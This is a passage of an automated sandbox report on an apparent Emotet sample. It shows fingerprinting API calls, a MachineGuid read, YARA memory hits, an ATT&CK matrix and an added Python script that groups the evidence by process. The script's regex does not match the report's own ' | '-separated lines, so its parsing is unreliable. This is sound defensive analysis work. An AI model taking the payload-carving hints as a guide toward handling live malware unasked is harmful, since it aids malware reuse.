Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,0_2_004293B8
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoA,MultiByteToWideChar,0_2_00429474
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,0_2_0042740F
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_004294E8
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoW,WideCharToMultiByte,0_2_0042959B
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoA,0_2_004277B6
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0040136B
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,0_2_0046BC16
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,1_2_004293B8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoA,MultiByteToWideChar,1_2_00429474
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004294E8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoW,WideCharToMultiByte,1_2_0042959B
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0040136B
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoA,_strncpy,1_2_00426DDE
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: _strlen,EnumSystemLocalesA,1_2_004272FD
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: _strlen,_strlen,EnumSystemLocalesA,1_2_00427334
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: _strlen,EnumSystemLocalesA,1_2_004273BA
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,1_2_0042740F
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: GetLocaleInfoA,1_2_004277B6
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,1_2_0046BC16
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041E125 cpuid 0_2_0041E125
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Queries volume information: C:\ VolumeInformation (7 occurrences)
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Queries volume information: C:\ VolumeInformation (6 occurrences)
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041735D GetSystemTimeAsFileTime,__aulldiv,0_2_0041735D
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041D4D6 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_0041D4D6
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004082C9 GetVersionExA,0_2_004082C9
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      Yara detected Emotet
      Source: Yara match | File source: 00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmp, type: MEMORY

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00473101 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,0_2_00473101
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0047371B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,0_2_0047371B
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00473101 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,1_2_00473101
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0047371B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,1_2_0047371B
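
      The evidence lines above (locale enumeration, cpuid, repeated volume-information queries, the MachineGuid registry read, and the YARA hits in memory dumps) are more useful once grouped per process. The script below is an added example, not part of this report or of the sandbox vendor's tooling: it parses a constructed subset of the lines on this page (kept in the fused form the HTML extraction produced, with the "Jump to behavior" link text still attached), collects the host-identifying API calls per process, counts the volume-information queries, flags the MachineGuid read, and decodes the memory-dump file names. The line grammar is inferred from this page only, and the field order assumed for the .sdmp names (process index, dump index, timestamp, base address, page protection, region type) is an assumption, not something the report documents; the page-protection constants themselves are the standard winnt.h values.

```python
"""Turn sandbox-report evidence lines into a per-process summary.

Added example (not part of the report or of the sandbox's own tooling). The
line grammar is inferred from the lines on this page; the .sdmp field layout
is an assumption.
"""
import re
from collections import defaultdict

# Windows memory page-protection constants (winnt.h).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}

# APIs (and the cpuid instruction) from the report that return host-identifying data.
FINGERPRINT_APIS = {
    "EnumSystemLocalesA", "GetLocaleInfoA", "GetVersionExA",
    "GetTimeZoneInformation", "GetSystemTimeAsFileTime", "cpuid",
}

# Constructed sample: a subset of the evidence lines from this report, kept in the
# fused form the HTML extraction produced (no space before the field label).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: _strlen,EnumSystemLocalesA,1_2_004272FD
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,1_2_0046BC16
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041E125 cpuid 0_2_0041E125
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Yara matchFile source: 00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
"""

EVIDENCE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*"
    r"(?P<kind>Code function|Queries volume information|Key value queried):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)
SDMP_RE = re.compile(
    r"^Source:\s*Yara match\s*File source:\s*"
    r"(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*type:\s*(?P<type>\w+)"
)
# "1_2_004272FD": <process index>_<n>_<virtual address>; only the VA is decoded here.
ADDR_RE = re.compile(r"^\d+_\d+_([0-9A-Fa-f]{8})$")


def parse_code_function(detail):
    """Split 'api,api,...,1_2_004272FD' into (list of API names, function VA)."""
    apis, addr = [], None
    for tok in re.split(r"[,\s]+", detail):
        m = ADDR_RE.match(tok)
        if m:
            addr = int(m.group(1), 16)
        elif tok:
            apis.append(tok)
    return apis, addr


def parse_dump_name(name):
    """Decode an .sdmp file name. Assumed field order (not stated on the page):
    process index . dump index . timestamp . base VA . page protection . region type."""
    fields = name[: -len(".sdmp")].split(".")
    prot = int(fields[4], 16)
    return {
        "proc_index": int(fields[0]),
        "base": int(fields[3], 16),
        "protection": PAGE_PROTECT.get(prot, hex(prot)),
    }


def summarize(text):
    """Return ({process path: summary}, [decoded memory dumps carrying a YARA hit])."""
    procs = defaultdict(lambda: {
        "fingerprint_apis": set(), "volume_queries": 0,
        "machineguid_read": False, "functions": [],
    })
    dumps = []
    for raw in text.splitlines():
        line = raw.strip()
        m = EVIDENCE_RE.match(line)
        if m:
            rec = procs[m["proc"]]
            if m["kind"] == "Code function":
                apis, addr = parse_code_function(m["detail"])
                rec["functions"].append((addr, apis))
                rec["fingerprint_apis"].update(a for a in apis if a in FINGERPRINT_APIS)
            elif m["kind"] == "Queries volume information":
                rec["volume_queries"] += 1
            elif m["detail"].endswith("MachineGuid"):
                rec["machineguid_read"] = True
            continue
        m = SDMP_RE.match(line)
        if m and m["type"] == "MEMORY":
            dumps.append(parse_dump_name(m["name"]))
    return dict(procs), dumps


if __name__ == "__main__":
    procs, dumps = summarize(SAMPLE_LINES)
    for path, rec in procs.items():
        print(path)
        print("  host-identifying APIs:", sorted(rec["fingerprint_apis"]))
        print("  volume-info queries:", rec["volume_queries"],
              "| MachineGuid read:", rec["machineguid_read"])
    for d in dumps:
        print(f"YARA hit in process {d['proc_index']} at {d['base']:#x} ({d['protection']})")
```

      Run it on the full export of the evidence section rather than the sample to get the real counts; the per-process grouping is what makes the dropped copy's MachineGuid read and locale enumeration stand out against the original sample, and a YARA hit in a region mapped PAGE_EXECUTE_READWRITE is the region to carve for the unpacked payload.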

      MITRE ATT&CK Matrix

      Techniques followed by digits are those the report's signatures mapped to; the digits are the report's per-technique hit badges, reproduced as extracted. The remaining cells are the rest of the matrix and were not observed.

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Execution through API 1 | Hidden Files and Directories 1 | Process Injection 2 | Masquerading 12 | Input Capture 2 | System Time Discovery 2 | Remote File Copy 1 | Input Capture 2 | Exfiltration Over Alternative Protocol 1 | Standard Cryptographic Protocol 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Replication Through Removable Media | Service Execution | Port Monitors | Accessibility Features | Hidden Files and Directories 1 | Network Sniffing | Process Discovery 3 | Remote Services | Data from Removable Media | Data Encrypted 1 | Uncommonly Used Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Process Injection 2 | Input Capture | Application Window Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Commonly Used Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Deobfuscate/Decode Files or Information 1 | Credentials in Files | File and Directory Discovery 2 | Logon Scripts | Input Capture | Data Encrypted | Remote File Copy 1 | SIM Card Swap | | Premium SMS Toll Fraud
      Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | File Deletion 1 | Account Manipulation | System Information Discovery 37 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Obfuscated Files or Information 2 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol 21 | Jamming or Denial of Service | | Abuse Accessibility Features

      Behavior Graph

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots
